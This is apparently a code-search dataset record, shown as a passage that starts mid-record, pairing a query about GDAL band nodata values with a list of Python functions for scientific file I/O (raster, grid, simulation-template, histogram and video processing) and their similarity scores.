FN):\n if FN.endswith('.dx'):\n F = open(FN, 'r')\n else:\n import gzip\n F = gzip.open(FN, 'r')\n\n # Read the header\n line = F.readline()\n while line.find('object') == -1:\n line = F.readline()\n header = {}\n header['counts'] = [int(x) for x in line.split(' ')[-3:]]\n for name in ['origin', 'd0', 'd1', 'd2']:\n header[name] = [float(x) for x in F.readline().split(' ')[-3:]]\n F.readline()\n header['npts'] = int(F.readline().split(' ')[-3])\n\n # Test to make sure the grid type is okay.\n # These conditions are not absolultely essential,\n # but they reduce the number of subtraction operations.\n if not (header['d0'][1] == 0 and header['d0'][2] == 0\n and header['d1'][0] == 0 and header['d1'][2] == 0\n and header['d2'][0] == 0 and header['d2'][1] == 0):\n raise Exception('Trilinear grid must be in original basis')\n if not (header['d0'][0] > 0 and header['d1'][1] > 0\n and header['d2'][2] > 0):\n raise Exception('Trilinear grid must have positive coordinates')\n\n # Read the data\n vals = np.ndarray(shape=header['npts'], dtype=float)\n index = 0\n while index < header['npts']:\n line = F.readline()[:-1]\n items = [float(item) for item in line.split()]\n vals[index:index + len(items)] = items\n index = index + len(items)\n F.close()\n\n data = {\n 'origin':np.array(header['origin']), \\\n 'spacing':np.array([header['d0'][0],header['d1'][1],header['d2'][2]]), \\\n 'counts':np.array(header['counts']), \\\n 'vals':vals}\n return data", "def UpdateGT(out_file, data, src_file, epsg = 4326, drv = 'GTiff', datatype = gdal.GDT_Float32, NoData = -999):\n \n #assign which driver to use for the file format - default is .tif\n driver = gdal.GetDriverByName(drv)\n \n #source raster from which to use the geospatial metadata\n src_gt = gdal.Open(src_file)\n \n #data shape - detects whether to produce multiple bands or not\n if len(data.shape) == 2:\n [cols, rows] = data.shape\n n = 1\n else:\n [n, cols, rows] = data.shape\n\n #create the destination file\n dst_gt = driver.Create(out_file, rows, cols, n, datatype)\n \n #get the geotransform from the source file\n gt = src_gt.GetGeoTransform()\n \n #coordinate system in which to create the raster, in wkt form\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(epsg)\n dest_wkt = srs.ExportToWkt()\n \n #set the projection in the desired reference system\n dst_gt.SetGeoTransform(gt)\n dst_gt.SetProjection(dest_wkt)\n \n #set the data\n if n==1:\n dst_gt.GetRasterBand(1).WriteArray(data)\n dst_gt.GetRasterBand(1).SetNoDataValue(NoData)\n #close and write to file\n dst_gt.FlushCache()\n #used if there are multiple bands\n else:\n for i in range(n):\n dst_gt.GetRasterBand(i+1).WriteArray(data[i])\n dst_gt.GetRasterBand(i+1).SetNoDataValue(NoData)\n dst_gt.FlushCache()", "def preparehspiceidvgGEO4(wheretosimpath,templatepath,modelverilogpath,modelcardpath,vgs,vds,Lparam,Ach_UFCMparam,Cins_UFCMparam,W_UFCMparam,NBODYparam,NFINparam):\n#L=Lparam Ach_UFCM=Ach_UFCMparam Cins_UFCM=Cins_UFCMparam W_UFCM=W_UFCMparam NBODY=NBODYparam NFIN=NFINparam\n #make an aux copy of hspice file to simulate\n shutil.copyfile(templatepath,wheretosimpath+'idvgaux.sp')\n #make an aux copy of modelcard file to simulate\n shutil.copyfile(modelcardpath,wheretosimpath+'modelcardaux.nmos')\n\n #update path of model and modelcard\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'pathmodelverilog', modelverilogpath)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'pathmodelcard', '\\\"modelcardaux.nmos\\\"')\n\n #bias update\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vgsi', str(vgs[0]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vgsf', str(vgs[-1]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vgsdelta', str(vgs[1]-vgs[0]))\n\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vdsi', str(vds[0]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vdsf', str(vds[-1]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vdsdelta', str(vds[1]-vds[0]))\n\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'Lparam', Lparam)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'Ach_UFCMparam',Ach_UFCMparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'Cins_UFCMparam', Cins_UFCMparam)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'W_UFCMparam',W_UFCMparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'NBODYparam',NBODYparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'NFINparam', NFINparam)", "def preparehspiceidvgGEO1(wheretosimpath,templatepath,modelverilogpath,modelcardpath,vgs,vds,Lparam,HFINparam,TFIN_TOPparam,TFIN_BASEparam,EOTparam,NBODYparam,NFINparam):\n #make an aux copy of hspice file to simulate\n shutil.copyfile(templatepath,wheretosimpath+'idvgaux.sp')\n #make an aux copy of modelcard file to simulate\n shutil.copyfile(modelcardpath,wheretosimpath+'modelcardaux.nmos')\n\n #update path of model and modelcard\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'pathmodelverilog', modelverilogpath)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'pathmodelcard', '\\\"modelcardaux.nmos\\\"')\n\n #bias update\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vgsi', str(vgs[0]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vgsf', str(vgs[-1]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vgsdelta', str(vgs[1]-vgs[0]))\n\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vdsi', str(vds[0]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vdsf', str(vds[-1]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vdsdelta', str(vds[1]-vds[0]))\n\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'Lparam', Lparam)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'HFINparam',HFINparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'TFIN_TOPparam', TFIN_TOPparam)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'TFIN_BASEparam',TFIN_BASEparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'EOTparam', EOTparam)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'NBODYparam',NBODYparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'NFINparam', NFINparam)", "def preparehspiceidvgGEO1v2(wheretosimpath,templatepath,modelverilogpath,modelcardpath,vgs,vds,Lparam,HFINparam,TFIN_TOPparam,TFIN_BASEparam,EOTparam,NBODYparam,NFINparam,PHIGparam,RSHSparam,RSHDparam):\n #make an aux copy of hspice file to simulate\n shutil.copyfile(templatepath,wheretosimpath+'idvgaux.sp')\n #make an aux copy of modelcard file to simulate\n shutil.copyfile(modelcardpath,wheretosimpath+'modelcardaux.nmos')\n\n #update path of model and modelcard\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'pathmodelverilog', modelverilogpath)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'pathmodelcard', '\\\"modelcardaux.nmos\\\"')\n\n #bias update\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vgsi', str(vgs[0]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vgsf', str(vgs[-1]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vgsdelta', str(vgs[1]-vgs[0]))\n\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vdsi', str(vds[0]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vdsf', str(vds[-1]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vdsdelta', str(vds[1]-vds[0]))\n\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'Lparam', Lparam)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'HFINparam',HFINparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'TFIN_TOPparam', TFIN_TOPparam)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'TFIN_BASEparam',TFIN_BASEparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'EOTparam', EOTparam)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'NBODYparam',NBODYparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'NFINparam', NFINparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'PHIGparam', PHIGparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'RSHSparam', RSHSparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'RSHDparam', RSHDparam)", "def render_vtk(file_name):\n import vtk\n\n # Read the source file.\n reader = vtk.vtkUnstructuredGridReader()\n reader.SetFileName(file_name)\n reader.Update() # Needed because of GetScalarRange\n output = reader.GetOutput()\n scalar_range = output.GetScalarRange()\n\n # Create the mapper that corresponds the objects of the vtk.vtk file\n # into graphics elements\n mapper = vtk.vtkDataSetMapper()\n mapper.SetInputData(output)\n mapper.SetScalarRange(scalar_range)\n\n # Create the Actor\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n\n # Create the Renderer\n renderer = vtk.vtkRenderer()\n renderer.AddActor(actor)\n renderer.SetBackground(1, 1, 1) # Set background to white\n\n # Create the RendererWindow\n renderer_window = vtk.vtkRenderWindow()\n renderer_window.AddRenderer(renderer)\n\n # Create the RendererWindowInteractor and display the vtk_file\n interactor = vtk.vtkRenderWindowInteractor()\n interactor.SetRenderWindow(renderer_window)\n interactor.Initialize()\n interactor.Start()", "def fgm2iaga(path,\n fgm_fname,\n ftype='v',\n output_template='{stn}{date:%Y%m%d}{ftype}{interval}.{interval}'):\n df = parse(fgm_fname)\n delta = (df.index[1] - df.index[0]).total_seconds()\n if delta == 1.0:\n interval = 'sec'\n elif delta == 60.0:\n interval = 'min'\n else:\n raise ValueError('unknown data interval found in {}'.format(fgm_fname))\n stn = df.siteid[:3].upper()\n out_fname = os.path.join(path,\n output_template.format(stn=stn.lower(),\n date=df.date,\n ftype=ftype,\n interval=interval))\n with open(out_fname, 'w') as fid:\n fid.write(HEADER_TEMPLATE.format(stn=stn.upper(),\n lat=df.lat,\n lon=df.lon,\n el=0))\n for row in df.itertuples():\n dt = row.Index\n if row.flag:\n X = Y = Z = F = 99999\n else:\n X = row.x\n Y = row.y\n Z = row.z\n F = np.linalg.norm([X, Y, Z])\n fid.write('{date:%Y-%m-%d %H:%M:%S.000} {date:%j}'\n ' {X:>9.2f} {Y:>9.2f} {Z:>9.2f} {F:>9.2f}\\n'.format(date=dt,\n X=X,\n Y=Y,\n Z=Z,\n F=F))\n return out_fname", "def render(self, outputfile, cmd=GDALTRANSLATE, working_memory=1024,\n compress=None, tempdir=None):\n tmpfile = NamedTemporaryFile(\n suffix='.tif', prefix='gdalrender',\n dir=os.path.dirname(outputfile), delete=False\n )\n\n try:\n with self.get_tempfile(dir=tempdir) as inputfile:\n warp_cmd = [\n cmd,\n '-q', # Quiet - FIXME: Use logging\n '-of', 'GTiff', # Output to GeoTIFF\n '-co', 'BIGTIFF=IF_SAFER', # Use BigTIFF if >2GB\n '-co', 'NUM_THREADS=ALL_CPUS', # multithreaded compression for GeoTiff\n # gdal_translate does not support the following\n # '-multi', # Use multiple processes\n # '-overwrite', # Overwrite outputfile\n ]\n\n # Set the working memory so that gdalwarp doesn't stall of disk\n # I/O\n warp_cmd.extend([\n # gdal_translate does not support -wm\n # '-wm', working_memory,\n '--config', 'GDAL_CACHEMAX', working_memory\n ])\n\n # Use compression\n compress = str(compress).upper()\n if compress and compress != 'NONE':\n warp_cmd.extend(['-co', 'COMPRESS=%s' % compress])\n if compress in ('LZW', 'DEFLATE'):\n warp_cmd.extend(['-co', 'PREDICTOR=2'])\n\n # Run gdalwarp and output to tmpfile.name\n warp_cmd.extend([inputfile.name, tmpfile.name])\n check_output_gdal([str(e) for e in warp_cmd])\n\n # If it succeeds, then we move it to overwrite the actual\n # output\n os.rename(tmpfile.name, outputfile)\n return outputfile\n finally:\n rmfile(tmpfile.name, ignore_missing=True)\n rmfile(tmpfile.name + '.aux.xml', ignore_missing=True)", "def transform_from_file(self,\n file,\n format):\n\n # Prepare query URL\n _query_builder = Configuration.base_uri\n _query_builder += '/transform'\n _query_parameters = {\n 'format': format\n }\n _query_builder = APIHelper.append_url_with_query_parameters(_query_builder,\n _query_parameters, Configuration.array_serialization)\n _query_url = APIHelper.clean_url(_query_builder)\n\n # Prepare files\n _files = {\n 'file': file\n }\n\n # Prepare and execute request\n _request = self.http_client.post(_query_url, files=_files)\n CustomHeaderAuth.apply(_request)\n _context = self.execute_request(_request)\n self.validate_response(_context)\n\n # Return appropriate type\n return _context.response.raw_body", "def main(input_file_path, layer='all', out=None, grid_id_name='GRIDMET_ID',\n buffer=25, scale_factor=0.1, function='invdist', smooth=0, params=None,\n grid_res=None, z_stats=True, res_plot=True, overwrite=False, \n options=None, grid_meta_path=None):\n # build fishnet for interpolation\n make_grid(input_file_path, \n grid_id_name=grid_id_name,\n grid_meta_path=grid_meta_path, \n buffer=buffer, \n overwrite=overwrite,\n grid_res=grid_res)\n \n # run spatial interpolation depending on options\n interpolate(\n input_file_path, \n layer=layer, \n out=out,\n scale_factor=scale_factor, \n function=function, \n smooth=smooth,\n params=params,\n buffer=buffer,\n z_stats=z_stats,\n res_plot=res_plot,\n grid_id_name=grid_id_name,\n grid_res=grid_res,\n options=options,\n grid_meta_path=grid_meta_path)", "def create_video(input_file, output_file):\n input_video = VideoFileClip(input_file)\n output_video = input_video.fl_image(detect_lane.fit_and_plot)\n output_video.write_videofile(output_file, audio=False)", "def populate(infile):\n main(infile)", "def read_vmdas(self,):\n fd = self.f\n # The raw files produced by VMDAS contain a binary navigation data\n # block.\n self.cfg['sourceprog'] = 'VMDAS'\n ens = self.ensemble\n k = ens.k\n if self._source != 1 and self._debug_level >= 1:\n print(' \\n***** Apparently a VMDAS file \\n\\n')\n self._source = 1\n self.vars_read += ['time_gps',\n 'latitude_gps',\n 'longitude_gps',\n 'etime_gps',\n 'elatitude_gps',\n 'elongitude_gps',\n 'flags',\n 'ntime', ]\n utim = fd.read_ui8(4)\n date = tmlib.datetime(utim[2] + utim[3] * 256, utim[1], utim[0])\n # This byte is in hundredths of seconds (10s of milliseconds):\n time = tmlib.timedelta(milliseconds=(int(fd.read_ui32(1) / 10)))\n fd.seek(4, 1) # \"PC clock offset from UTC\" - clock drift in ms?\n ens.time_gps[k] = tmlib.date2epoch(date + time)[0]\n ens.latitude_gps[k] = fd.read_i32(1) * self._cfac\n ens.longitude_gps[k] = fd.read_i32(1) * self._cfac\n ens.etime_gps[k] = tmlib.date2epoch(date + tmlib.timedelta(\n milliseconds=int(fd.read_ui32(1) * 10)))[0]\n ens.elatitude_gps[k] = fd.read_i32(1) * self._cfac\n ens.elongitude_gps[k] = fd.read_i32(1) * self._cfac\n fd.seek(12, 1)\n ens.flags[k] = fd.read_ui16(1)\n fd.seek(6, 1)\n utim = fd.read_ui8(4)\n date = tmlib.datetime(utim[0] + utim[1] * 256, utim[3], utim[2])\n ens.ntime[k] = tmlib.date2epoch(date + tmlib.timedelta(\n milliseconds=int(fd.read_ui32(1) / 10)))[0]\n fd.seek(16, 1)\n self._nbyte = 2 + 76", "def init_from_file(self,file_name):\n with open(file_name, mode='rb') as file: # b is important -> binary\n file_content = file.read(1)\n x = file_content\n ct = int.from_bytes(x, byteorder='little', signed=False)\n file_content = file.read(ct)\n header = file_content.decode().split(\" \")\n vindex = header.index('-vectortype')\n vectortype = header[vindex + 1]\n\n if vectortype != 'REAL':\n print('Can\\'t initialize real vector store from ',vectortype,' vectors.')\n return\n\n #read in vectors and wrap in RealVectors\n incoming_terms, incoming_vectors = svu.readfile(file_name)\n self.init_from_lists(incoming_terms,incoming_vectors)", "def readDriverFile(self, input_file):\n\n\n fid = open(self.basePath + input_file,'r')\n\n # Line 1\n line = fid.readline()\n l_input = line.split('!')\n mshfile = l_input[0].rstrip()\n\n # Line 2\n line = fid.readline()\n l_input = line.split('!')\n obsfile = l_input[0].rstrip()\n\n # Line 3\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input=='null':\n topofile = []\n\n else:\n topofile = l_input[0].rstrip()\n\n\n # Line 4\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n mstart = float(l_input[1])\n\n else:\n mstart = l_input[0].rstrip()\n\n # Line 5\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n mref = float(l_input[1])\n\n else:\n mref = l_input[0].rstrip()\n\n # Line 6\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n staticInput = float(l_input[1])\n\n elif l_input[0]=='DEFAULT':\n staticInput = None\n\n else:\n staticInput = l_input[0].rstrip()\n\n\n # Line 7\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input=='DEFAULT':\n magfile = []\n\n else:\n magfile = l_input[0].rstrip()\n\n # Line 8\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input=='DEFAULT':\n wgtfile = []\n\n else:\n wgtfile = l_input[0].rstrip()\n\n # Line 9\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n chi = float(l_input[0])\n\n # Line 10\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n val = np.array(l_input[0:4])\n alphas = val.astype(np.float)\n\n # Line 11\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n val = np.array(l_input[1:3])\n bounds = val.astype(np.float)\n\n else:\n bounds = l_input[0].rstrip()\n\n # Line 12\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n val = np.array(l_input[1:6])\n lpnorms = val.astype(np.float)\n\n else:\n lpnorms = l_input[0].rstrip()\n\n # Line 13\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n val = np.array(l_input[1:3])\n eps = val.astype(np.float)\n\n else:\n eps = [None,None]\n\n self.mshfile = mshfile\n self.obsfile = obsfile\n self.topofile = topofile\n self.mstart = mstart\n self._mrefInput = mref\n self._staticInput = staticInput\n self.magfile = magfile\n self.wgtfile = wgtfile\n self.chi = chi\n self.alphas = alphas\n self.bounds = bounds\n self.lpnorms = lpnorms\n self.eps = eps", "def create_verde_rules_lp(schema_file, input_file, mapping_file,\n query_fields, trial_id, directory, rule_config, baseline_lp,\n verde_rule_template_dir):\n\n logging.info(f'creating verde rules lp based on {schema_file} and {mapping_file}')\n\n context = Dict()\n context.id = trial_id\n context.directory = directory\n context.rule_config = rule_config\n context.verde_rule_template_dir = verde_rule_template_dir\n\n # Load the input mapping json\n with open(mapping_file) as f:\n mapping_json = json.load(f)\n\n lp_str = \"\"\n # Apply each verde rule to extend the lp\n if rule_config.rule_01_causal_relationships.do:\n lp_str += vrule01.rule_01_causal_relationships(context, schema_file, mapping_json, query_fields)\n else:\n logging.warning('verde rule_01_causal_relationships is disabled in config')\n\n if rule_config.rule_02_data_precision.do:\n lp_str += vrule02.rule_02_data_precision(context, mapping_json, query_fields)\n else:\n logging.warning('verde rule_02_data_precision is disabled in config')\n\n if rule_config.rule_03_ordinal_sort.do:\n lp_str += vrule03.rule_03_ordinal_sort(context, schema_file, input_file, mapping_json, query_fields)\n else:\n logging.warning('verde rule_03_ordinal_sort is disabled in config')\n\n if rule_config.rule_04_entity_colours.do:\n lp_str += vrule04.rule_04_colour(context, schema_file, mapping_json)\n else:\n logging.warning('verde rule_04_entity_colours is disabled in config')\n\n lp = lp_str.split('\\n') # bit messy, we used lists elsewhere then moved to jinja templates\n\n # Write out the partial lp containing the data schema and our verde soft rules\n if rule_config.write_lp:\n lp_file = os.path.join(directory, f'{context.id}_verde_schema_query.lp')\n vutils.write_list_to_file(baseline_lp + lp, lp_file, 'verde full schema and query lp')\n\n return baseline_lp + lp", "def create_true_vectors(filename, reference_file):\n\n all_cases = np.array([], dtype=np.int64).reshape(0, cs.NN_VECTOR_LENGTH)\n alignment_file = open(filename, 'r')\n\n for line in alignment_file:\n line = line.split('\\t')\n if len(line) >= 9:\n vector_nn = np.array(reference_to_signal_partial_mapping(line[9], reference_file, line[0][3:], line[1],\n int(line[2]), int(line[4])))\n all_cases = np.append(all_cases, vector_nn, axis=0)\n if len(all_cases) > cs.NUMBER_OF_EXAMPLES:\n break\n\n return all_cases", "def produce_13TeV_template(tag_name=\"HKHI\"):\n num_rebin = 1\n file_name = \"inputs/BkgEstimation_Lin/BkgEstimation_NONE_TOPO_PTDEP_\"+tag_name+\"_Lin.root\"\n print \"Input: \", file_name\n fin = ROOT.TFile.Open(file_name, \"read\")\n h_nom = fin.Get(\"bkg_total_gg_full\").Clone(\"bkg_nominal_old\")\n h_nom.Rebin(num_rebin)\n fout = ROOT.TFile.Open(\"hists_input_\"+tag_name+\".root\", \"recreate\")\n\n h_purity_sys = fin.Get(\"bkg_purity_syst_gg_full\").Clone(\"bkg_purity_syst_gg\")\n h_reducible_sys = fin.Get(\"bkg_reducible_syst_gg_full\").Clone(\"bkg_reducible_syst_gg\")\n h_irreducible_sys = fin.Get(\"bkg_irreducible_syst_gg_full\").Clone(\"bkg_irreducible_syst_gg\")\n h_iso_sys = fin.Get(\"bkg_iso_syst_gg_full\").Clone(\"bkg_iso_syst_gg\")\n\n #file_iso = \"isolation_sys/hist.root\"\n #fin2 = ROOT.TFile.Open(file_iso, \"read\")\n #h_iso_sys = fin2.Get(\"bkg_isolation_syst_gg\")\n ## inflat irreducible uncertainty by factor of 10\n # so that it closes to stats uncertainty in data\n sf = 1\n if INFLATE_SYS:\n sf = 10\n\n # after rebinning systematic uncertainties, need to scale down,\n # otherwise the uncertainties are inflated.\n h_purity_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_irreducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_reducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_iso_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n\n ## truncate the histograms to [200, 2000] GeV\n h_nom_new = truncate_hist(h_nom, \"bkg_nominal\")\n h_purity_sys_new = truncate_hist(h_purity_sys, \"h_purity_sys_new\")\n h_irreducible_sys_new = truncate_hist(h_irreducible_sys, \"h_irreducible_sys_new\")\n h_reducible_sys_new = truncate_hist(h_reducible_sys, \"h_reducible_sys_new\")\n h_iso_sys_new = truncate_hist(h_iso_sys, \"h_iso_sys_new\")\n\n #write down sys and nominal\n fout.cd()\n h_nom_new.Write()\n h_purity_sys_new.Write()\n h_reducible_sys_new.Write()\n h_irreducible_sys_new.Write()\n h_iso_sys_new.Write()\n\n h_purity_up, h_purity_down = create_sys_hist(h_nom_new, h_purity_sys_new, \"purity_sys\")\n h_purity_up.Write()\n h_purity_down.Write()\n\n h_red_up, h_red_down = create_sys_hist(h_nom_new, h_reducible_sys_new, \"reducible_sys\")\n h_red_up.Write()\n h_red_down.Write()\n\n h_irred_up, h_irred_down = create_sys_hist(h_nom_new, h_irreducible_sys_new, \"irreducible_sys\")\n h_irred_up.Write()\n h_irred_down.Write()\n\n h_iso_up, h_iso_down = create_sys_hist(h_nom_new, h_iso_sys, \"isolation_sys\")\n h_iso_up.Write()\n h_iso_down.Write()\n\n fin.Close()\n fout.Close()", "def process_svgs(model_info, directory, output, allow_missing=False):\n r2dt.write(model_info, directory, output, allow_missing=allow_missing)" ]
[ "0.6332105", "0.6148278", "0.60546756", "0.6035137", "0.59595346", "0.58744794", "0.58276", "0.58268255", "0.57943213", "0.57037807", "0.56656307", "0.5467358", "0.541127", "0.5396852", "0.53866345", "0.53866345", "0.53640836", "0.5348823", "0.52539855", "0.5224854", "0.51994747", "0.5192403", "0.51900554", "0.5165529", "0.5159512", "0.515376", "0.5151332", "0.51434046", "0.5141987", "0.5133459", "0.5118285", "0.5111108", "0.50902104", "0.50852007", "0.50811803", "0.5078187", "0.5068416", "0.5063147", "0.50577945", "0.50099593", "0.50085336", "0.5002134", "0.4996009", "0.49745375", "0.49737355", "0.49719802", "0.49691865", "0.4965909", "0.49294093", "0.49206844", "0.49177408", "0.49156937", "0.49134704", "0.49087375", "0.4901378", "0.48920193", "0.48857296", "0.4869468", "0.4869468", "0.48694164", "0.4854838", "0.484103", "0.48405656", "0.48332667", "0.48232844", "0.4822603", "0.4820913", "0.48203066", "0.4819152", "0.48039868", "0.47993007", "0.47940227", "0.47916836", "0.4788897", "0.47862664", "0.47828332", "0.47616982", "0.47546104", "0.47536212", "0.4749284", "0.474661", "0.47417504", "0.47408664", "0.47398564", "0.47284323", "0.4727966", "0.47255188", "0.47156096", "0.47144514", "0.47106367", "0.4708809", "0.47057223", "0.47050765", "0.47025943", "0.47021836", "0.47015566", "0.46951467", "0.4694794", "0.46844468", "0.46841887" ]
0.6055037
2
Returns gdal.Band.GetNoDataValue() as a NumPy type
def GetNoDataValue(self): result = super(Band, self).GetNoDataValue() if result is not None: return self.NumPyDataType(result)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_band_nodata(self, band_idx=1):\n if band_idx < 1 or band_idx > self.dataset.RasterCount:\n raise IndexError(\"band index is out of range\")\n return self.dataset.GetRasterBand(band_idx).GetNoDataValue()", "def _nodata_value(self):\n try:\n nodata = float(self._info[\"bands\"][0][\"noDataValue\"])\n except KeyError:\n nodata = None\n return nodata", "def get_raster_nodata(self):\n\n nodata = list()\n for i in range(0, self.dataset.RasterCount):\n nodata.append(self.dataset.GetRasterBand(i + 1).GetNoDataValue())\n\n return nodata if len(nodata) >= 0 and not all(\n d is None for d in nodata) else None", "def sentinel_to_numpy(ds: xr.Dataset) -> np.ndarray:\n array = ds.transpose(\"lat\", \"lon\", \"band\").to_array().values\n\n return np.squeeze(array, 0)", "def data_missing():\n return RaggedArray([[], [-1, 0, 1]], dtype='int16')", "def read_raster (self, filename):\n raster = gdal.Open (filename)\n band = raster.GetRasterBand(1)\n x = band.ReadAsArray () \n nodata_val = band.GetNoDataValue () # get the missing data flag\n x [x == nodata_val] = np.nan # set missing data properly\n return (x)", "def setup_no_data_values(input_dataset, options):\n in_nodata = []\n if options.srcnodata:\n nds = list(map(float, options.srcnodata.split(',')))\n if len(nds) < input_dataset.RasterCount:\n in_nodata = (nds * input_dataset.RasterCount)[:input_dataset.RasterCount]\n else:\n in_nodata = nds\n else:\n for i in range(1, input_dataset.RasterCount+1):\n raster_no_data = input_dataset.GetRasterBand(i).GetNoDataValue()\n if raster_no_data is not None:\n in_nodata.append(raster_no_data)\n\n if options.verbose:\n print(\"NODATA: %s\" % in_nodata)\n\n return in_nodata", "def getNoData(self):\n #---+----|----+----|----+----|----+----|----+----|----+----|----+----|\n return TreeLikelihoodBase.getNoData(self)", "def test_nodata(self):\n\n \n filename = 'data/test_grid.asc'\n R = read_coverage(filename)\n \n nan = R.get_nodata_value()\n assert nan == -9999\n \n A = R.get_data(nan=False)\n assert numpy.min(A[:]) == -9999\n assert numpy.allclose(numpy.max(A[:]), 50.9879837036) \n \n A = R.get_data(nan=True)\n assert numpy.allclose(numpy.nanmin(A[:]), -50.60135540866)\n assert numpy.allclose(numpy.nanmax(A[:]), 50.9879837036)", "def isna(self):\n # type: () -> np.ndarray\n return extract_isnull_bytemap(self.data)", "def isna(self):\n # type: () -> np.ndarray\n return extract_isnull_bytemap(self.data)", "def test_scalar_null(self):\n dset = self.f.create_dataset('x', shape=(), dtype='i1')\n out = dset[()]\n self.assertIsInstance(out, np.int8)", "def unmasked_data(self):\n return numpy.ma.filled(self.data.astype(numpy.float_),\n fill_value=numpy.nan)", "def astype(self, dtype):\n return NoneArray", "def getBinnedData(self):\n return self._array.sum(0)", "def test_single_null(self):\n dset = self.f.create_dataset('x', (1,), dtype='i1')\n out = dset[()]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, (1,))", "def read_gdal_values(dataset=None, nodata=None):\n nbands = dataset.RasterCount\n\n # data values\n bands = []\n for i in range(nbands):\n band = dataset.GetRasterBand(i + 1)\n nd = band.GetNoDataValue()\n data = band.ReadAsArray()\n if nodata is not None:\n data[data == nd] = nodata\n bands.append(data)\n\n return np.squeeze(np.array(bands))", "def none(self, type_name):\n provenance = NQExprProvenance(operation='none', args=(type_name, None))\n np_vec = self.zeros_numpy_array(type_name, as_matrix=True)\n return self.as_nql(np_vec, type_name, provenance)", "def nonans(array):\n return array[~np.isnan(array)]", "def test_raster_integer_nan_value():\n cvs = ds.Canvas(plot_height=2, plot_width=2, x_range=(0, 1), y_range=(0,1))\n array = np.array([[9999, 1, 2, 3], [4, 9999, 6, 7], [8, 9, 9999, 11]])\n coords = {'x': np.linspace(0, 1, 4), 'y': np.linspace(0, 1, 3)}\n xr_array = xr.DataArray(array, coords=coords, dims=['y', 'x'])\n\n agg = cvs.raster(xr_array, downsample_method='max', nan_value=9999)\n expected = np.array([[4, 7], [9, 11]])\n\n assert np.allclose(agg.data, expected)\n assert agg.data.dtype.kind == 'i'\n assert np.allclose(agg.x.values, np.array([0.25, 0.75]))\n assert np.allclose(agg.y.values, np.array([0.25, 0.75]))", "def noSpecificValues(self):\n return self.__noSpecificValues(self.__result)", "def mask_nodata(self):\n ds_out = self._obj\n for var in self.vars:\n ds_out[var] = ds_out[var].raster.mask_nodata()\n return ds_out", "def zero_to_nodata(base_raster):\n target_raster = base_raster.copy()\n target_raster[target_raster == 0] = _IC_NODATA\n return target_raster", "def get_nonzeros(self):\n return self.tape.get_nonzeros(self.machine.eval_symbol,\n self.machine.eval_state(self.state))", "def test_qf_dataarray_dtype_for_nan_volume(self):\n tickers = [BloombergTicker(\"FMIM10 Index\")]\n start_date = 